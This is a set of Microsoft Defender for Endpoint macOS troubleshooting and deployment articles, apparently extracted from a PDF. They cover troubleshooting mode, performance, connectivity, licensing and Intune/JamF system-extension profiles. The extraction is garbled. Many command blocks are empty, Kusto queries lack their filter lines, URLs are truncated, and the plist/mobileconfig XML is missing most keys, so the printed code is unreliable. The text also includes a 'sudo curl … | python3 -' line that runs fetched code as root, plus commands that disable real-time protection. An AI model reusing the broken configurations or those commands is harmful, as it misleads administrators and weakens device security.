groupIds mdatp edr group-ids --

group-id [group]
Endpoint DLP mdatp config mdatp config

data_loss_prevention -- data_loss_prevention --
value enabled value disabled
During troubleshooting mode, you can't:
Disable tamper protection for Microsoft Defender for Endpoint on macOS.

Uninstall the Microsoft Defender for Endpoint on macOS.
Prerequisites
７ Note
Troubleshooting mode on macOS is currently in public preview. Review the

prerequisites carefully.
Supported version of macOS for Microsoft Defender for Endpoint.

Microsoft Defender for Endpoint must be tenant-enrolled and active on the device.
Permissions for "Manage security settings in Security Center" in Microsoft
Platform Update version: 101.23122.0005 or newer.
Beta Channel (formerly Insiders-Fast), or Current Channel (Preview) (formerly
Insiders-Slow)
Enable troubleshooting mode on macOS
1. Go to the Microsoft Defender XDR portal , and sign in.
2. Navigate to the device page you would like to turn on troubleshooting mode.
Then, select the ellipses(...) and select Turn on troubleshooting mode.
７ Note
The Turn on troubleshooting mode option is available on all devices, even if

the device does not meet the prerequisites for troubleshooting mode.
3. Read the information displayed on the pane and once you're ready, select Submit
to confirm that you want to turn on troubleshooting mode for that device.
4. You'll see It might take a few minutes for the change to take effect text being
displayed. During this time, when you select the ellipses again, you'll see the Turn
On Troubleshooting mode is pending option grayed-out.
5. Once complete, the device page shows that the device is now in troubleshooting
mode.
If the end-user is logged-in on the macOS device, they'll see the following text:
Troubleshooting mode has started. This mode allows you to temporarily change
settings that are managed by your Administrator. Expires at YEAR-MM-
DDTHH:MM:SSZ.
Select OK.
6. Once enabled, you can test the different command line options that are togglable
in the troubleshooting mode (TS Mode).
For example, when you use mdatp config real-time-protection --value disabled
command to disable real time protection, you'll be prompted to enter your
password. Select OK after entering your password.
The output report similar to the following screenshot will be displayed on running
mdatp health with real_time_protection_enabled as "false" and tamper_protection
as "block."
Advanced hunting queries for detection

There are some prebuilt advanced hunting queries to give you visibility into the
troubleshooting events that are occurring in your environment. You can use these
queries to create detection rules to generate alerts when devices are in troubleshooting
mode.
Get troubleshooting events for a particular device

You can use the following query to search by deviceId or deviceName by commenting
out the respective lines.
Kusto
//let deviceName = "<deviceName>"; // update with device name

let deviceId = "<deviceID>"; // update with device id
DeviceEvents
| where DeviceId == deviceId
//| where DeviceName == deviceName
| project Timestamp,DeviceId, DeviceName, _tsmodeproperties,
_tsmodeproperties.TroubleshootingState,
_tsmodeproperties.TroubleshootingPreviousState,
_tsmodeproperties.TroubleshootingStartTime,
_tsmodeproperties.TroubleshootingStateExpiry,
_tsmodeproperties.TroubleshootingStateRemainingMinutes,
_tsmodeproperties.TroubleshootingStateChangeReason,
_tsmodeproperties.TroubleshootingStateChangeSource
Devices currently in troubleshooting mode

You can find the devices that are currently in troubleshooting mode using the following
query:
Kusto
DeviceEvents
| where Timestamp > ago(3h) // troubleshooting mode automatically disables
after 4 hours
"started"
|summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by
DeviceId
Count of troubleshooting mode instances by device

You can find the number of troubleshooting mode instances for a device using the
following query:
Kusto
DeviceEvents
| where Timestamp > ago(30d) // choose the date range you want
"started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by
DeviceId
| sort by count_
Total count
You can know the total count of troubleshooting mode instances using the following
query:
Kusto
DeviceEvents
| where Timestamp > ago(2d) //beginning of time range
| where Timestamp < ago(1d) //end of time range
"started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count()
| where count_ > 5 // choose your max # of TS mode instances for
your time range
Recommended content
Microsoft Defender XDR for Endpoint on Mac
Microsoft Defender XDR for Endpoint integration with Microsoft Defender XDR for
Cloud Apps
Get to know the innovative features in Microsoft Edge
Web protection
Create indicators
 Tip
Feedback

Troubleshoot installation issues for
macOS
Article • 11/15/2023
Applies to:

Installation failed
For manual installation, the Summary page of the installation wizard says, "An error
occurred during installation. The Installer encountered an error that caused the
installation to fail. Contact the software publisher for assistance." For MDM
deployments, it displays as a generic installation failure as well.
While we don't display an exact error to the end user, we keep a log file with installation
progress in /Library/Logs/Microsoft/mdatp/install.log . Each installation session
appends to this log file. You can use sed to output the last installation session only:
Bash
sed -n 'H; /^preinstall com.microsoft.wdav begin/h; ${g;p;}'

/Library/Logs/Microsoft/mdatp/install.log
Output
preinstall com.microsoft.wdav begin [2020-03-11 13:08:49 -0700] 804

INSTALLER_SECURE_TEMP=/Library/InstallerSandboxes/.PKInstallSandboxManager/C
B509765-70FC-4679-866D-8A14AD3F13CC.activeSandbox/89FA879B-971B-42BF-B4EA-
7F5BB7CB5695
correlation id=CB509765-70FC-4679-866D-8A14AD3F13CC
[ERROR] Downgrade from 100.88.54 to 100.87.80 is not permitted
preinstall com.microsoft.wdav end [2020-03-11 13:08:49 -0700] 804 => 1
In this example, the actual reason is prefixed with [ERROR] . The installation failed
because a downgrade between these versions isn't supported.
MDATP install log missing or not updated

In rare cases, installation leaves no trace in MDATP's
/Library/Logs/Microsoft/mdatp/install.log file. First, verify that an installation happened.
Then analyze possible errors by querying macOS logs. It's helpful to do this in MDM
deployments, when there's no client UI. We recommend that you use a narrow time
window to run a query and filter by the logging process name, as there will be a huge
amount of information.
Bash
grep '^2020-03-11 13:08' /var/log/install.log
Output
log show --start '2020-03-11 13:00:00' --end '2020-03-11 13:08:50' --info --

debug --source --predicate 'processImagePath CONTAINS[C] "install"' --style
syslog
 Tip
Feedback

Troubleshoot performance issues for
macOS
Article • 03/08/2023
Applies to:

This topic provides some general steps that can be used to narrow down performance
issues related to Microsoft Defender for Endpoint on macOS.
Depending on the applications that you're running and your device characteristics, you
may experience suboptimal performance when running Microsoft Defender for Endpoint
on macOS. In particular, applications or system processes that access many resources
over a short timespan can lead to performance issues in Microsoft Defender for
Endpoint on macOS.
２ Warning
Before starting, please make sure that other security products are not currently
running on the device. Multiple security products may conflict and impact the host
performance.
Troubleshoot performance issues using Real-

time Protection Statistics
Applies to:
Only performance issues related to AV
Real-time protection (RTP) is a feature of Defender for Endpoint on macOS that

continuously monitors and protects your device against threats. It consists of file and
process monitoring and other heuristics.
The following steps can be used to troubleshoot and mitigate these issues:
1. Disable real-time protection using one of the following methods and observe
whether the performance improves. This approach helps narrow down whether
Microsoft Defender for Endpoint on macOS is contributing to the performance
issues.
If your device is not managed by your organization, real-time protection can be

disabled using one of the following options:
From the user interface. Open Microsoft Defender for Endpoint on macOS
and navigate to Manage settings.
From the Terminal. For security purposes, this operation requires elevation.
Bash
If your device is managed by your organization, real-time protection can be

disabled by your administrator using the instructions in Set preferences for
If the performance problem persists while real-time protection is off, the

origin of the problem could be the endpoint detection and response
component. In this case, please contact customer support for further
instructions and mitigation.
2. Open Finder and navigate to Applications > Utilities. Open Activity Monitor and
analyze which applications are using the resources on your system. Typical
examples include software updaters and compilers.
3. To find the applications that are triggering the most scans, you can use real-time
statistics gathered by Defender for Endpoint on Mac.
７ Note
This feature is available in version 100.90.70 or newer. This feature is enabled

by default on the Dogfood and InsiderFast channels. If you're using a
different update channel, this feature can be enabled from the command line:
Bash
mdatp config real-time-protection-statistics --value enabled
This feature requires real-time protection to be enabled. To check the status of

real-time protection, run the following command:
Bash
Verify that the real_time_protection_enabled entry is true. Otherwise, run the

following command to enable it:
Bash
Output
Configuration property updated
To collect current statistics, run:
Bash
mdatp diagnostic real-time-protection-statistics --output json >

real_time_protection.json
７ Note
Using --output json (note the double dash) ensures that the output format is
ready for parsing. The output of this command will show all processes and
their associated scan activity.
4. On your Mac system, download the sample Python parser high_cpu_parser.py
using the command:
Bash
curl -O https://raw.githubusercontent.com/microsoft/mdatp-
xplat/master/linux/diagnostic/high_cpu_parser.py
The output of this command should be similar to the following:
Output
--2020-11-14 11:27:27-- https://raw.githubusercontent.com/microsoft.

mdatp-xplat/master/linus/diagnostic/high_cpu_parser.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)...
151.101.xxx.xxx
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|
151.101.xxx.xxx| :443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1020 [text/plain]
Saving to: 'high_cpu_parser.py'
100%[===========================================>] 1,020 --.-K/s
in
0s
5. Next, type the following commands:
Bash
chmod +x high_cpu_parser.py
Bash
cat real_time_protection.json | python high_cpu_parser.py >

real_time_protection.log
The output of the above is a list of the top contributors to performance issues. The
first column is the process identifier (PID), the second column is the process name,
and the last column is the number of scanned files, sorted by impact.
For example, the output of the command will be something like the below:
Output
... > python ~/repo/mdatp-xplat/linux/diagnostic/high_cpu_parser.py

<~Downloads/output.json | head -n 10
27432 None 76703
73467 actool 1249
73914 xcodebuild 1081
73873 bash 1050
27475 None 836
1 launchd 407
73468 ibtool 344
549 telemetryd_v1 325
4764 None 228
125 CrashPlanService 164
To improve the performance of Defender for Endpoint on Mac, locate the one with
the highest number under the Total files scanned row and add an exclusion for it.
For more information, see Configure and validate exclusions for Defender for
Endpoint on macOS.
７ Note
The application stores statistics in memory and only keeps track of file activity
since it was started and real-time protection was enabled. Processes that were
launched before or during periods when real time protection was off are not
counted. Additionally, only events which triggered scans are counted.
6. Configure Microsoft Defender for Endpoint on macOS with exclusions for the
processes or disk locations that contribute to the performance issues and re-
enable real-time protection.
See Configure and validate exclusions for Microsoft Defender for Endpoint on
macOS for details.
Troubleshoot performance issues using

Microsoft Defender for Endpoint Client
Analyzer
Applies to:
Performance issues of all available Defender for Endpoint components such as AV

and EDR
The Microsoft Defender for Endpoint Client Analyzer (MDECA) can collect traces, logs,
and diagnostic information in order to troubleshoot performance issues on onboarded
devices on macOS.
７ Note
The Microsoft Defender for Endpoint Client Analyzer tool is regularly used by
Microsoft Customer Support Services (CSS) to collect information such as (but
not limited to) IP addresses, PC names that will help troubleshoot issues you
may be experiencing with Microsoft Defender for Endpoint. For more
information about our privacy statement, see Microsoft Privacy Statement .
As a general best practice, it is recommended to update the Microsoft
Defender for Endpoint agent to latest available version and confirming that
the issue still persists before investigating further.
To run the client analyzer for troubleshooting performance issues, see Run the client
analyzer on macOS and Linux.
７ Note
In case after following the above steps, the performance problem persists, please
contact customer support for further instructions and mitigation.
See also
 Tip
Feedback

for Microsoft Defender for Endpoint on
macOS
Article • 07/18/2023
Applies to:

Platform macOS
This topic describes how to Troubleshoot cloud connectivity issues for Microsoft
Run the connectivity test

To test if Defender for Endpoint on Mac can communicate to the cloud with the current
network settings, run a connectivity test from the command line:
Bash
expected output:
Bash
Testing connection with https://cdn.x.cp.wd.microsoft.com/ping ... [OK]

Testing connection with https://eu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://wu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://x.cp.wd.microsoft.com/api/report ... [OK]
Testing connection with https://winatp-gw-cus.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-eus.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-weu.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-neu.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-ukw.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-uks.microsoft.com/test ... [OK]
Testing connection with https://eu-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://us-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://uk-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://v20.events.data.microsoft.com/ping ... [OK]
If the connectivity test fails, check if the device has Internet access and if any of the
endpoints required by the product are blocked by a proxy or firewall.
Failures with curl error 35 or 60 indicate certificate pinning rejection, which indicates a
potential issue with SSL or HTTPS inspection. See instructions below regarding SSL
inspection configuration.
Troubleshooting steps for environments

without proxy or with Proxy autoconfig (PAC)
or with Web Proxy Autodiscovery Protocol
(WPAD)
Use the following procedure to test that a connection is not blocked in an environment
without a proxy or with Proxy autoconfig (PAC) or with Web Proxy Autodiscovery
Protocol (WPAD).
permitted in the previously listed URLs.
２ Warning
Authenticated proxies are not supported. Ensure that only PAC, WPAD, or a static
proxy is being used. SSL inspection and intercepting proxies are also not supported
for security reasons. Configure an exception for SSL inspection and your proxy
server to directly pass through data from Microsoft Defender for Endpoint on
macOS to the relevant URLs without interception. Adding your interception
certificate to the global store will not allow for interception. To test that a
connection is not blocked: In a browser such as Microsoft Edge for Mac or Safari
open https://x.cp.wd.microsoft.com/api/report and
https://cdn.x.cp.wd.microsoft.com/ping .
Optionally, in Terminal, run the following command:
Bash

The output from this command should be similar to:
Bash
 Tip
Feedback

Troubleshoot license issues for
macOS
Article • 12/07/2023
Applies to:

No license found
When Microsoft Defender for Endpoint on macOS is being deployed, an error message
with an x on top of the Microsoft Defender for Endpoint on macOS shield appears.
Select the x symbol.
Message
When you select the x symbol, you'll see options as shown in the following screenshot:
When you select Action needed, you'll get the error message as shown in the following
screenshot:
You'll encounter this message in a different way: If you're using the terminal to enter
mdatp health without the double quotes, the message as shown in the following
screenshot is displayed:
Cause
1. You've deployed and/or installed the Microsoft Defender for Endpoint on macOS
package Download installation packages, but might not have run the configuration
script Download the onboarding package that contains the license settings. For
information on troubleshooting in this scenario, see For not running the
configuration script.
2. You can also encounter this error message when the Microsoft Defender for
Endpoint on macOS agent isn't up to date. For information on troubleshooting in
this scenario, see For Microsoft Defender for Endpoint on macOS not being up to
date.
3. You can also encounter this error message if you haven't assigned a license to the
user. For information on troubleshooting in this scenario, see For not assigning a
license to the user.
Solutions
For not running the configuration script

This section describes the troubleshooting measures when the error/warning message is
caused by non-execution of the configuration script that contains the license settings
after you have deployed and/or installed the Microsoft Defender for Endpoint on
macOS package.
Depending on the deployment management tool used, follow the tool-specific

instructions to onboard the package (register the license) as described in the following
table:
ﾉ Expand table
Management License deployment instructions (Onboarding instructions)
Intune Download the onboarding package
JamF Step 1: Get the Microsoft Defender for Endpoint onboarding package
Other MDM License settings
Manual installation Download installation and onboarding packages; and Onboarding Package
７ Note
If the onboarding package runs correctly, the licensing information will be located
in /Library/Application
Support/Microsoft/Defender/com.microsoft.wdav.atp.plist .
For Microsoft Defender for Endpoint on macOS not being up to

date
For scenarios where Microsoft Defender for Endpoint on macOS isn't up to date, you'll
need to update the agent.
For not assigning a license to the user
1. In the Microsoft Defender portal (security.microsoft.com):
a. Select Settings. The Settings screen appears.
b. Select Endpoints.
The Endpoints screen appears.
c. Select Licenses.

d. Select View and purchase licenses in the Microsoft 365 admin center. The
following screen in the Microsoft 365 admin center portal appears:
e. Check the checkbox of the license you want to purchase from Microsoft, and
select it. The screen displaying detail of the chosen license appears:
f. Select the Assign licenses link.
The following screen appears:
g. Select + Assign licenses.
h. Enter the name or email address of the person to whom you want to assign this
license.
The following screen appears, displaying the details of the chosen license
assignee and a list of options.
i. Check the checkboxes for Microsoft 365 Advanced Auditing, Microsoft
Defender XDR, and Microsoft Defender for Endpoint.
j. Select Save.
On implementing these solution-options (either of them), if the licensing issues have

been resolved, and then you run mdatp health, you should see the following results:
Sign in with your Microsoft account

Message
Sign in with your Microsoft account to get started.
Create new account or Switch to enterprise app.
Cause
You've downloaded and installed Microsoft Defender for individuals on macOS on top
of previously installed Microsoft Defender for Endpoint.
Solution
Select Switch to enterprise app to switch to Enterprise experience.
You can also suppress switching to experience for Individuals on MDM-enrolled

machines by including userInterface/consumerExperience in the Defender's settings:
XML
<dict>
<key>consumerExperience</key>
</dict>
Recommended content
Manual deployment for Microsoft Defender for Endpoint on macOS: Install
Microsoft Defender for Endpoint on macOS manually from the command line.
Set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro: Learn
how to set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro.
Microsoft Defender for Endpoint on Mac: Learn how to install, configure, update,
and use Microsoft Defender for Endpoint on Mac.
Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro: Learn how to
deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.
 Tip
Feedback

Troubleshoot system extension issues in
macOS
Article • 08/30/2023
Applies to:

You can submit feedback by opening Microsoft Defender for Endpoint on Mac on your
device and by navigating to Help > Send feedback.
Another option is to submit feedback via the Microsoft Defender XDR by launching
security.microsoft.com and selecting the Give feedback tab.
This article provides information on how to troubleshoot issues with the system
extension that's installed as part of Microsoft Defender for Endpoint on macOS.
Starting with macOS BigSur (11), Apple's macOS requires all system extensions to be
explicitly approved before they're allowed to run on the device.
Symptom
You'll notice that the Microsoft Defender for Endpoint has an x symbol in the shield, as
shown in the following screenshot:

If you click the shield with the x symbol, you'll get options as shown in the following
screenshot:

Click Action needed.
The screen as shown in the following screenshot appears:
You can also run mdatp health: It reports if real-time protection is enabled but not
available. This report indicates that the system extension isn't approved to run on your
device.
Bash
mdatp health
The output on running mdatp health is:

Output
healthy : false
health_issues : ["no active event provider", "network
event provider not running", "full disk access has not been granted"]
...
real_time_protection_enabled : unavailable
real_time_protection_available: unavailable
...
full_disk_access_enabled : false
The output report displayed on running mdatp health is shown in the following
screenshot:
Cause
macOS requires that a user manually and explicitly approves certain functions that an
application uses, for example, system extensions, running in background, sending
notifications, full disk access, and so on. Microsoft Defender for Endpoint relies on these
applications and can't properly function until all these consents are received from a user.
If you didn't approve the system extension during the deployment/installation of

Microsoft Defender for Endpoint on macOS, perform the following steps:
1. Check the system extensions by running the following command in the terminal:
BashCopy
systemextensionsctl list
You'll notice that both Microsoft Defender for Endpoint on macOS extensions are in the
[activated waiting for user] state.
2. In the terminal, run the following command:
BashCopy
mdatp health --details system_extensions
You'll get the following output:
OutputCopy
network_extension_enabled : false
network_extension_installed : true
endpoint_security_extension_ready : false
endpoint_security_extension_installed : true
This output is shown in the following screenshot:


The following files might be missing if you're managing it via Intune, JamF, or another
MDM solution:
ﾉ Expand table
MobileConfig (Plist) "mdatp health" console macOS

command output setting
needed for
MDE on
macOS to
function
properly
"/Library/Managed real_time_protection_subsystem System

Preferences/com.apple.system-extension- extension
policy.plist"
"/Library/Managed network_events_subsystem Network Filter

Preferences/com.apple.webcontent-filter.plist" extension
"/Library/Managed full_disk_access_enabled Privacy

Preferences/com.apple.TCC.configuration- Preference
profile-policy.plist" Policy
Controls
(PPPC, aka
TCC
(Transparency,
Consent &
Control), Full
Disk Access
(FDA))
"/Library/Managed n/a End-user

Preferences/com.apple.notificationsettings.plist" notifications
"/Library/Managed n/a Background

Preferences/servicemanagement.plist" services
"/Library/Managed full_disk_access_enabled (for Accessibility

Preferences/com.apple.TCC.configuration- DLP)
profile-policy.plist"
To troubleshoot the issue of missing files to make Microsoft Defender for Endpoint on
macOS work properly, see Microsoft Defender for Endpoint on Mac.
Solution
This section describes the solution of approving the functions such system extension,
background services, notifications, full disk access, and so on using the management
tools, namely Intune, JamF, Other MDM, and using the method of manual deployment.
To perform these functions using these management tools, see:
Intune
JamF
Other MDM
Manual deployment
Prerequisites
Prior to approving the system extension (using any of the specified management tools),
ensure that the following prerequisites are fulfilled:
Step 1: Are the profiles coming down to your macOS?

If you're using Intune, see Manage macOS software update policies in Intune.
1. Click the ellipses (three dots).

2. Select Refresh devices. The screen as shown in the following screenshot appears:
3. In Launchpad, type System Preferences.
4. Double-click Profiles.
７ Note
If you aren't MDM joined, you won't see Profiles as an option. Contact your
MDM support team to see why the Profiles option isn't visible. You should be
able to see the different profiles such as System Extensions, Accessibility,
Background Services, Notifications, Microsoft AutoUpdate, and so on, as
shown in the preceding screenshot.
If you're using JamF, use sudo jamf policy. For more information, see Policy
Management .
Step 2: Ensure that the profiles needed for Microsoft Defender for
Endpoint are enabled
The section Sections that provide guidance on enabling profiles needed for Microsoft
Defender for Endpoint provides guidance on how to address this issue, depending on
the method that you used to deploy Microsoft Defender for Endpoint on macOS.
７ Note
A proper naming convention for your configuration profiles is a real advantage. We

recommend the following naming scheme: Name of the Setting(s) [(additional
info)] -Platform - Set - Policy-Type For example, FullDiskAccess (piloting) -
macOS - Default - MDE
Using the recommended naming convention enables you to confirm that the correct
profiles are dropping down at the time of checking.
 Tip
To ensure that the correct profiles are coming down, instead of typing
.mobileconfig (plist), you can download this profile from Github, to avoid typos
elongated hyphens.
In terminal, enter the following syntax:
curl -O https://URL
For example,
BashCopy
xplat/master/macos/mobileconfig/profiles/sysext.mobileconfig
Sections that provide guidance on enabling profiles needed for

1. Function: Approve System Extensions

Mobile config (plist): https://github.com/microsoft/mdatp-
xplat/blob/master/macos/mobileconfig/profiles/sysext.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Manual: Must approve the extension by going to Security Preferences or
System Preferences > Security & Privacy and then selecting Allow.
2. Function: Network Filter

xplat/blob/master/macos/mobileconfig/profiles/netfilter.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
System Preferences > Security & Privacy and then selecting Allow.
3. Function: Privacy Preference Policy Controls (PPPC, aka TCC (Transparency,

Consent & Control), Full Disk Access (FDA))
xplat/blob/master/macos/mobileconfig/profiles/fulldisk.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
System Preferences > Security & Privacy > Privacy > Full Disk Access and
then selecting Allow, and checking the box next to the following:
Microsoft Defender
Microsoft Defender Security Extension
4. Function: Running in background

xplat/blob/master/macos/mobileconfig/profiles/background_services.mobile
config
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Manual: Not applicable
5. Function: Sending notifications

xplat/blob/master/macos/mobileconfig/profiles/notif.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
6. Function: Accessibility
xplat/blob/master/macos/mobileconfig/profiles/accessibility.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Step 3: Test the installed profiles using macOS built-in 'profile' tool.
It compares your profiles with what we have published in GitHub,
reporting inconsistent profiles or profiles missing altogether
1. Download the script from https://github.com/microsoft/mdatp-
xplat/tree/master/macos/mdm .
2. Click Raw. The new URL will be
https://raw.githubusercontent.com/microsoft/mdatp-
xplat/master/macos/mdm/analyze_profiles.py .
3. Save it as analyze_profiles.py to Downloads by running the following command in
terminal:
BashCopy
xplat/master/macos/mdm/analyze_profiles.py
4. Run the profile analyzer python3 script without any parameters by executing the
following command in terminal:
BashCopy
cd /Downloads
sudo python3 analyze_profiles.py
７ Note
Sudo permissions are required to execute this command.
OR
5. Run the script directly from the Web by executing the following command:
BashCopy
sudo curl https://raw.githubusercontent.com/microsoft/mdatp-

xplat/master/macos/mdm/analyze_profiles.py
| python3 -
７ Note
Sudo permissions are required to execute this command.
The output will show all potential issues with profiles.
Recommended content
Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro: Learn how to
deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.
Set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro: Learn
how to set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro.
Set up device groups in Jamf Pro: Learn how to set up device groups in Jamf Pro
for Microsoft Defender for Endpoint on macOS.
Log in to Jamf Pro
Feedback

Manage profiles and approve
extensions using Intune
Article • 08/30/2023
This article describes the procedures to follow to manage profiles properly using the
Intune management tool.
Intune
Intune System Extensions Policy

To approve the system extensions:
1. In Intune, select Manage > Device configuration, and then select Manage >
Profiles > Create Profile.
2. Choose a name for the profile. Change Platform=macOS to Profile

type=Extensions, and then select Create.
3. In the Basics tab, give a name to this new profile.
4. In the Configuration settings tab, add the following entries in the Allowed system
extensions section:
ﾉ Expand table
Bundle identifier Team identifier
com.microsoft.wdav.epsext UBF8T346G9
com.microsoft.wdav.netext UBF8T346G9

5. In the Assignments tab, assign this profile to All Users & All devices.
6. Review and create this configuration profile.
Create the custom configuration profile

The custom configuration profile enables the network extension and grants Full Disk
Access to the Endpoint Security system extension.
1. Save the following content to a file named sysext.xml:
PowerShell
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC

"-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-
1.0.dtd">
<plist version="1">
<dict>
<string>7E53AC50-B88D-4132-99B6-29F7974EAA3C</string>
<string>Microsoft Corporation</string>
<string>7E53AC50-B88D-4132-99B6-29F7974EAA3C</string>
<string>Microsoft Defender System Extensions</string>
<string/>
<true/>
<true/>
<array>
<dict>
<string>2BA070D9-2233-4827-AFC1-1F44C8C8E527</string>
<string>com.apple.webcontent-filter</string>
<string>CEBF7A71-D9A1-48BD-8CCF-BD9D18EC155A</string>
<string>Approved Network Extension</string>
<string/>
<true/>
<key>FilterType</key>
<string>Plugin</string>
<key>UserDefinedName</key>
<string>Microsoft Defender Network Extension</string>
<key>PluginBundleID</key>
<key>FilterSockets</key>
<true/>
<key>FilterDataProviderBundleIdentifier</key>
<string>com.microsoft.wdav.netext</string>
<key>FilterDataProviderDesignatedRequirement</key>
<string>identifier "com.microsoft.wdav.netext" and
anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /*
exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */
and certificate leaf[subject.OU] = UBF8T346G9</string>
</dict>
<dict>
<string>56105E89-C7C8-4A95-AEE6-E11B8BEA0366</string>
<string>com.apple.TCC.configuration-profile-policy</string>
<string>56105E89-C7C8-4A95-AEE6-E11B8BEA0366</string>
<string>Privacy Preferences Policy Control</string>
<string/>
<true/>
<key>Services</key>
<dict>
<key>SystemPolicyAllFiles</key>
<array>
<dict>
<key>Identifier</key>
<string>com.microsoft.wdav.epsext</string>
<key>CodeRequirement</key>
<string>identifier "com.microsoft.wdav.epsext"
and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6]
/* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists
*/ and certificate leaf[subject.OU] = UBF8T346G9</string>
<key>IdentifierType</key>
<string>bundleID</string>
<key>StaticCode</key>
<key>Allowed</key>
</dict>
</array>
</dict>
</dict>
</array>
</dict>
</plist>
Verify that the above content was copied into the file correctly. From terminal, run the
following command and verify that it outputs to the result as shown in the following
example:
PowerShell
$ plutil -lint sysext.xml

sysext.xml: OK
Deploy this custom configuration profile

1. In Intune, select Manage > Device configuration, and then select Manage >
Profiles > Create profile.
2. Choose a name for the profile. For the Platform attribute, set the value as macOS
and for the Profile type attribute, set the value as Custom, and then select
Configure. The file sysext.xml is created.
3. Open the configuration profile and upload the sysext.xml file.
4. Select OK.
5. In the Assignments tab, assign this profile to All Users & All devices.
6. Review and create this configuration profile.
Feedback

Manage system extensions using JamF
Article • 02/21/2024
This article describes the procedures to implement in the process of managing the
system extensions to ensure Microsoft Defender for Endpoint works properly on macOS.
JamF
JAMF System Extensions Policy

To approve the system extensions, perform the following steps:
1. Select Computers > Configuration Profiles, and then select Options > System
Extensions.
2. Select Allowed System Extensions from the System Extension Types drop-down
list.
3. Use UBF8T346G9 for Team ID.
4. Add the following bundle identifiers to the Allowed System Extensions list:
com.microsoft.wdav.epsext
com.microsoft.wdav.netext

Privacy Preferences Policy Control (also known as Full

Disk Access)
Add the following JAMF payload to grant Full Disk Access to the Microsoft Defender for
Endpoint Security Extension. This policy is a prerequisite for running the extension on
your device.
1. Select Options > Privacy Preferences Policy Control.
2. Use com.microsoft.wdav.epsext as the Identifier and Bundle ID as Bundle type.
3. Set Code Requirement to identifier com.microsoft.wdav.epsext and anchor apple

generic and certificate 1[field.1.2.840.113635.100.6.2.6] / exists / and certificate
leaf[field.1.2.840.113635.100.6.1.13] / exists / and certificate leaf[subject.OU] =
UBF8T346G9.
4. Set App or service to SystemPolicyAllFiles and access to Allow.


Network Extension Policy

Defender portal. The following policy allows the network extension to perform this
functionality:
７ Note
JAMF doesn't have built-in support for content filtering policies, which are a
prerequisite for enabling the network extensions that Microsoft Defender for
Endpoint on macOS installs on the device. Furthermore, JAMF sometimes changes
the content of the policies being deployed. As such, the following steps provide a
workaround that involves signing the configuration profile.
1. Save the following content to your device as com.microsoft.network-

extension.mobileconfig using a text editor:
PowerShell
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC

"-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-
1.0.dtd">
<plist version="1">
<dict>
<string>DA2CC794-488B-4AFF-89F7-6686A7E7B8AB</string>
<string>DA2CC794-488B-4AFF-89F7-6686A7E7B8AB</string>
<string/>
<true/>
<true/>
<array>
<dict>
<string>2BA070D9-2233-4827-AFC1-1F44C8C8E527</string>
<string>com.apple.webcontent-filter</string>
<string>CEBF7A71-D9A1-48BD-8CCF-BD9D18EC155A</string>
<string>Approved Network Extension</string>
<string/>
<true/>
<key>FilterType</key>
<string>Plugin</string>
<key>UserDefinedName</key>
<key>PluginBundleID</key>
<key>FilterSockets</key>
<true/>
<key>FilterDataProviderBundleIdentifier</key>
<string>com.microsoft.wdav.netext</string>
<key>FilterDataProviderDesignatedRequirement</key>
<string>identifier "com.microsoft.wdav.netext" and anchor
apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */
and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and
certificate leaf[subject.OU] = UBF8T346G9</string>
</dict>
</array>
</dict>
</plist>
2. Verify that the above content was copied correctly into the file by running the
plutil utility in terminal:
BashCopy
$ plutil -lint <PathToFile>/com.microsoft.network-extension.mobileconfig
For example, if the file was stored in Documents:
BashCopy
$ plutil -lint ~/Documents/com.microsoft.network-extension.mobileconfig
3. Verify that the command outputs OK
BashCopy
<PathToFile>/com.microsoft.network-extension.mobileconfig: OK
4. Follow the instructions on this page to create a signing certificate using JAMF's
built-in certificate authority.
5. After the certificate is created and installed to your device, run the following
command from terminal to sign the file:
BashCopy
$ security cms -S -N "<CertificateName>" -i

<PathToFile>/com.microsoft.network-extension.mobileconfig -o
<PathToSignedFile>/com.microsoft.network-extension.signed.mobileconfig
For example, if the certificate name is SigningCertificate and the signed file is going to
be stored in Documents:
BashCopy
$ security cms -S -N "SigningCertificate" -i

~/Documents/com.microsoft.network-extension.mobileconfig -o
~/Documents/com.microsoft.network-extension.signed.mobileconfig
